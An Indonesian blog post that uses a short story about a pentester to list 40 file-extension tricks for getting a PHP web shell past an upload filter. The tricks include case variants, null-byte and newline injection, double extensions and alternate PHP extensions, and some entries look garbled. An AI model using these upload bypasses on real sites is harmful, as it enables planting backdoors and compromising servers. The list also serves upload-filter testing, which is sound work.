MASIGNALPHAS2101
3071178398193978069

40 Macam-Macam Bypass Ekstensi Upload Shell Backdoor !!! Cara Bypass Ekstensi Upload Shell Backdoor !!!

40 Macam-Macam Bypass Ekstensi Upload Shell Backdoor !!! Cara Bypass Ekstensi Upload Shell Backdoor !!!
Add Comments
Thursday, December 17, 2020

Hai, apakah kamu pernah melakukan penetrations testing pada fitur upload file?

Jika pernah, pasti kamu sering melakukan bypass ekstensi menggunakan nama-nama file tertentu yang berujung / berakhir pada .php bukan??

Nah, pada pembahasan kali ini kita akan membahas terkait macam-macam ekstensi pembypassan pada file, namun silahkan pahami terlebih dahulu, bahwa konten ini dibuat hanya sebagai EDUKASI Pengetahuan SEMATA, Bukan untuk disalah gunakan, apalagi sampai merugikan orang lain, silahkan simak dengan baik ya !

Alur Cerita :
Ada seorang pentester yang bernama Asep, dia sedang melakukan pentest terhadap salah satu situs jual beli online.

Pada saat dia login ke akun pada situsnya, dia melihat terdapat fitur profile yang dimana user dapat mengupload sebuah gambar, pada fitur ini si asep berusaha mengakalinya agar dapat mengupload sebuah script php seperti "Shell Backdoor".

Nah, si asep mulai kebingungan karena pada saat dia mengupload file dengan ext .php server menolaknya, dengan peringatan file ini tidak diizinkan untuk diupload.

Namun, si asep tidak kehabisan akal.
Diapun melakukan beberapa pembypassan seperti dibawah ini..


1) .PhP
2) .phtml
3) .pHP
4) .phP
5) .p%00Hp
6) .pht
7) .pphp
8) .pHp
9) .phtxt
10) .%0aphp
11) .shtml
12) .shtp
13) .pfly
14) .mph4p
15) . php
16) .ph p
17) .phtm
18) .aspxp
19) .php7
20) .php6
21) .php5
22) .php10
23) .php1
24) .php3
25) .ph
26) .phg
27) .pjpeg
28) .phpng
29) .ppng
30) .phl
31) .jpg.php
32) .php.jpg
33) .php jpg
34) .php png
35) .php%00jpg
36) .php%2ejpg
37) .jpg%2ephp
38) .p HP
39) .PHP
40) .shtmp%00hp


Nah, ada banyak bukan?
Alhasil si asep pun berhasil menanamkan file php dengan bypass ekstensinya.

Sebenarnya masih banyak dan lebih dari itu, namun yang kita bahas kali ini hanya sampai 40 macam bypass ekstensi file saja ya...


Hai! Jika Kamu Belajar Hal Baru Hari Ini, Jangan Lupa Share Artikel Ini, Semoga Artikel Kali Ini Dapat Bermanfaat Untuk Kamu Dan Temanmu, Terimakasih Telah Membaca Dan Sampai Jumpa Di Artikel Selanjutnya..

Note: Only a member of this blog may post a comment.